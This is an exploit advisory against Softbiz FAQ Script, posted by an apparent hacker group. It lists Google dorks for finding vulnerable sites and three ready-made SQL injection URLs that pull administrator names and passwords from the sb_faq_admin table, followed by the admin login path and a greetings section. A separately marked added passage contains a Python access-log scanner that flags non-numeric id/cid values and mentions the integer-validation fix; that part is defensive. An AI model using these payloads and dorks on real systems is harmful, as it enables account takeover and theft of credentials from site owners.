Softbiz FAQ Script suffers from multiple SQL injection vulnerabilities.
|___________________________________________________|
|
| Softbiz FAQ Script Multiple SQL Injection Vulnerability
|
|___________________________________________________
|--------------------IQ-Security--------------------|
|
| Author: Hussin X
|
| Home : WwW.IQ-TY.CoM | wWw.TrYaG.cC
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script : http://www.softbizscripts.com
|
| DorK : inurl:"faq_qanda.php?id="
| DorK : inurl:"index.php?cid="
| DorK : inurl: "print_article.php?id="
|___________________________________________________|
Exploit:
________
1
www.[target].com/Script/faq_qanda.php?id=-1+union+select+null,null,concat_ws(0x3a,adminname,adminpwd),null,null,null,null,null,null,null,null,null+from+sb_faq_admin--
2
www.[target].com/Script/index.php?cid=-1+union+select+null,concat_ws(0x3a,adminname,adminpwd),null,null+from+sb_faq_admin--
3
www.[target].com/Script/print_article.php?id=-1+union+select+null,null,concat_ws(0x3a,adminname,adminpwd),null,null,null,null,null,null,null,null,null+from+sb_faq_admin--
Login :
www.[target].com/Script/admin/
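
Detection note (an added example, not part of the original advisory): all three requests above place SQL in a parameter that should only ever hold an integer, so a web server access log can be checked for non-numeric `id` / `cid` values on the affected scripts. The combined log format, the sample log lines and the function names are assumptions made for this sketch.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Numeric parameter each affected script reads, per the advisory.
NUMERIC_PARAMS = {
    "faq_qanda.php": "id",
    "index.php": "cid",
    "print_article.php": "id",
}

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_param(log_line):
    """Return (script, param, value) when a numeric parameter is not a plain integer, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    param = NUMERIC_PARAMS.get(script)
    if param is None:
        return None
    # parse_qsl decodes %XX and '+', so encoded payloads are compared in clear form.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == param and not re.fullmatch(r"\d{1,10}", value):
            return (script, param, value)
    return None


# Constructed sample log lines (addresses from documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /Script/faq_qanda.php?id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /Script/index.php?cid=-1+union+select+null,null+from+t-- HTTP/1.1" 200 734',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /Script/print_article.php?id=3%20UNION%20SELECT%201 HTTP/1.1" 200 801',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /Script/admin/ HTTP/1.1" 200 900',
]


def scan(lines):
    return [hit for hit in map(suspicious_param, lines) if hit]


if __name__ == "__main__":
    for script, param, value in scan(SAMPLE_LOG):
        print(f"non-numeric {param} on {script}: {value!r}")
```

The same integer-only rule, enforced in the application before the value reaches the query (or by binding it as a typed parameter), is the corresponding fix.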
____________________________( Greetz )_________________________________
|
| IQ-Security > WwW.IQ-TY.CoM | wWw.TrYaG.cC
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
|______________________________________________________________________
I'm IRAQi